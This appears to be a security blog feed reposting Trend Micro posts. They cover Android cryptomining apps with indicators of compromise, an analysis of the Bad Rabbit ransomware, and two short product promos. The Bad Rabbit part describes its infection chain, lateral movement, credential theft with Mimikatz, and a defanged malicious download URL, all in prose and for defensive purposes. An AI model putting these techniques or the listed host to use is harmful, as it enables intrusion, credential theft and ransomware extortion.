We have identified a total 25 samples of ANDROIDOS_CPUMINER. Trend Micro Mobile Security already detects these variants, as well as the JSMINER variants mentioned earlier in this post.

These threats highlight how even mobile devices can be used for cryptocurrency mining activities, even if, in practice, the effort results in an insignificant amount of profit. Users should take note of any performance degradation on their devices after installing an app.

We have reached out to Google, and the apps mentioned in this post are no longer on Google Play.

Indicators of Compromise

The following malicious apps were found on Google Play and are connected to this threat:

SHA256 hash App name Package name Detection name
22581e7e76a09d404d093ab755888743b4c908518c47af66225e2da991d112f0 Recitiamo Santo Rosario Free prsolutions.rosariofacileads ANDROIDOS_JSMINER
440cc9913d623ed42563e90eec352da9438a9fdac331017af2ab9b87a5eee4af SafetyNet Wireless App com.freemo.safetynet ANDROIDOS_JSMINER
d3c0bed627edab9ac1bbc2bcc6e8c3ff45b4708afa527790e42a4a6fe2c045f0 Car Wallpaper HD: mercedes, ferrari, bmw and audi com.yrchkor.newwallpapers ANDROIDOS_CPUMINER



Author: Jason Gu, Veo Zhang, Seven Shen


  • 0

Bad Rabbit Ransomware Spreads via Network, Hits Ukraine and Russia

Category : Trend Micro

An ongoing ransomware campaign is hitting Eastern European countries with what seems to be a variant of the Petya ransomware dubbed Bad Rabbit (which we detect as RANSOM_BADRABBIT.A). Trend Micro XGen™ security products with machine learning enabled can proactively detect this ransomware as TROJ.Win32.TRX.XXPE002FF019 without the need for a pattern update. The attack comes a few months after the previous Petya outbreak, which struck European countries back in June.

Initial reports peg the main casualties as transport systems and media outlets in Ukraine and Russia. The Ukranian arm of CERT (CERT-UA) has also issued an advisory warning of further potential ransomware attacks.

Initial Analysis

Figure 1: Bad Rabbit Infection Chain

Figure 1: Bad Rabbit Infection Chain

Our initial analysis found that Bad Rabbit spreads via watering hole attacks that lead to a fake Flash installer “install_flash_player.exe”. Compromised sites are injected with a script that contains a URL that resolves to hxxp://1dnscontrol[.]com/flash_install, which is inaccessible as of the time of publication. We’ve observed some compromised sites from Denmark, Ireland, Turkey, and Russia where it delivered the fake Flash installer.

 Figure 2: Code showing the injected script

Figure 2: Code showing the injected script

Once the fake installer is clicked, it will drop the encryptor file infpub.dat using the rundll32.exe process, along with the decryptor file dispci.exe. As part of its routine, Bad Rabbit uses a trio of files referencing the show Game of Thrones, starting with rhaegal.job, which is responsible for executing the decryptor file, as well as a second job file, drogon.job, that is responsible for shutting down the victim’s machine. The ransomware will then proceed to encrypt files in the system and display the ransom note shown above.

 Figure 3: Bad Rabbit ransom note showing the installation key

Figure 3: Bad Rabbit ransom note showing the installation key

A third file, viserion_23.job, reboots the target system a second time. The screen is then locked, and the following note displayed:

 Figure 4: Bad Rabbit ransom note displayed after system reboot

Figure 4: Bad Rabbit ransom note displayed after system reboot

Based on our initial analysis, Bad Rabbit spreads to other computers in the network by dropping copies of itself in the network using its original name and executing the dropped copies using Windows Management Instrumentation (WMI) and Service Control Manager Remote Protocol. When the Service Control Manager Remote Protocol is used, it uses dictionary attacks for the credentials.

Among the tools Bad Rabbit reportedly incorporates is the open-source utility Mimikatz, which it uses for credential extraction. We also found evidence of it using DiskCryptor, a legitimate disk encryption tool, to encrypt the target systems.

It is important to note that Bad Rabbit does not exploit any vulnerabilities, unlike Petya which used EternalBlue as part of its routine.

Mitigation and Best Practices

Users can mitigate the impact of ransomware such as Bad Rabbit with the best practices found in this guide.

Trend Micro Solutions

Trend Micro XGen™ security provides a cross-generational blend of threat defense techniques against a full range of threats for data centerscloud environmentsnetworks, and endpoints. It features high-fidelity machine learning to secure the gateway and endpoint data and applications, and protects physical, virtual, and cloud workloads. With capabilities like web/URL filtering, behavioral analysis, and custom sandboxing, XGen™ protects against today’s purpose-built threats that bypass traditional controls, exploit known, unknown, or undisclosed vulnerabilities, and either steal or encrypt personally identifiable data. Smart, optimized, and connected, XGen™ powers Trend Micro’s suite of security solutions: Hybrid Cloud Security, User Protection, and Network Defense.

Further information about Trend Micro solutions can be found in this article.

The following SHA256 hashes are detected as RANSOM_BADRABBIT.A:

  • 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da
  • 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93

Additional hashes related to this ransomware:


  • 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da


  • 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648
  • 141d45d650580ed4b0d0fc4b8fd5448da67b30afbe07781da02c39d345a8f4a0


  • 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93

Updated on October 24, 2017, 9:52 PM PDT to add more technical information 

Updated on October 24, 2017, 11:34 PM PDT to add the infection chain

Updated on October 25, 2017, 10:23 PM PDT to update the infection chain



  • 0

No More Limits

Category : Trend Micro

Watch Josh Atwell, Developer Advocate at NetApp, explain. For more information, please visit

  • 0

Maximize VMware on AWS

Category : Trend Micro

It’s been this binary choice for customers for far too long in trying to make a decision between VMware and AWS.

For many years if you wanted to use both VMware and AWS, it required a lot of reprogramming and retraining of staff to get the two solutions to work in tandem. Now, that’s no longer the case. For more information, please visit: